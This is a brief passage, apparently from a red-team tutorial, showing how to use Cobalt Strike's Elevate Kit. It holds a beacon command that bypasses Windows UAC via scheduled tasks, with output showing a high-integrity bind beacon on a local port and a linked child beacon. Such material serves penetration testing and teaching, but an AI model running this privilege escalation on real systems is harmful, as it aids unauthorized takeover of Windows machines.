Cobalt Strike comes with the Elevate Kit which eases the process of elevating privileges with a few builtin bypasses. To use it, invoke elevate:

beacon> elevate uac-schtasks tcp-local
[*] Tasked Beacon to run windows/beacon_bind_tcp (127.0.0.1:4444) in a high integrity context
[+] established link to child beacon: 10.10.123.102